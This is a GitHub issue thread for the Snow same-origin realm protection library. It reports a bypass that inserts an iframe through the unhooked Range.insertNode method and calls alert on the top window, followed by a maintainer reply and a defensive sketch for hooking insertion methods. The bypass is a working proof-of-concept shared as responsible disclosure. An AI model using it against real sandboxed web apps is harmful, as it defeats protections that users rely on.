LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!
https://lavamoat.github.io/snow/demo/
MIT License

Bypass with Range.insertNode #86

Closed mmndaniel closed 1 year ago

mmndaniel commented 1 year ago

Nothing too clever, just yet another node insertion method that isn't hooked :)

var range = document.createRange();
var f = document.createElement("iframe");
range.selectNode(document.getElementsByTagName("head")[0]);
range.insertNode(f);
f.contentWindow.alert.call(top, 1);

weizman commented 1 year ago

Thanks, #103 should fix this.

Are there any other ways to use Range to inject a dom node? I didn't find any @mmndaniel

mmndaniel commented 1 year ago

Not that I'm aware of, but the DOM is wild so who knows :)
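
The report above comes down to hook coverage: a frame inserted through a method that is not wrapped never reaches the protection logic. The following is an added defensive sketch, not Snow's code and not the change in #103, of wrapping an insertion method such as `Range.prototype.insertNode` so that each inserted frame is handed to a callback before the caller regains control. The names `collectFrames`, `hookInsertion`, `onFrame`, `protectFrame` and `FakeRange` are hypothetical, and the sample nodes are constructed so it runs outside a browser.

```javascript
// Added example: all names here are hypothetical, not Snow's API.
const FRAME_TAGS = new Set(['IFRAME', 'FRAME']);

// Gather frame elements from a node and its subtree (covers DocumentFragment input).
function collectFrames(node, out = []) {
  if (!node || typeof node !== 'object') return out;
  if (FRAME_TAGS.has(String(node.tagName || '').toUpperCase())) out.push(node);
  for (const child of Array.from(node.childNodes || [])) collectFrames(child, out);
  return out;
}

// Wrap proto[method] so every frame passed through it reaches onFrame
// before control returns to the caller. Returns the native function.
function hookInsertion(proto, method, onFrame) {
  const native = proto[method];
  if (typeof native !== 'function') throw new TypeError(`${method} is not a function`);
  proto[method] = function (...args) {
    // Collect first: inserting a DocumentFragment empties it.
    const frames = args.flatMap((arg) => collectFrames(arg));
    const result = native.apply(this, args);
    // A frame has a contentWindow only once attached, so protect after the native call.
    frames.forEach((frame) => onFrame(frame));
    return result;
  };
  return native;
}

// Constructed stand-in for Range so the sketch runs outside a browser.
function demo() {
  class FakeRange {
    insertNode(node) {
      collectFrames(node).forEach((f) => { f.contentWindow = {}; }); // simulate attachment
      if (node.tagName === undefined) node.childNodes = [];           // fragment is emptied
    }
  }
  const seen = [];
  hookInsertion(FakeRange.prototype, 'insertNode',
    (f) => seen.push(`${f.id}:${f.contentWindow ? 'attached' : 'detached'}`));
  const range = new FakeRange();
  range.insertNode({ tagName: 'iframe', id: 'a', childNodes: [] });
  range.insertNode({ childNodes: [{ tagName: 'DIV', childNodes: [
    { tagName: 'IFRAME', id: 'b', childNodes: [] }] }] });
  return seen;
}

// In a browser: hookInsertion(Range.prototype, 'insertNode', protectFrame);
```

Collecting the frames before the native call matters for fragments, whose children are moved into the document and no longer reachable from the argument afterwards.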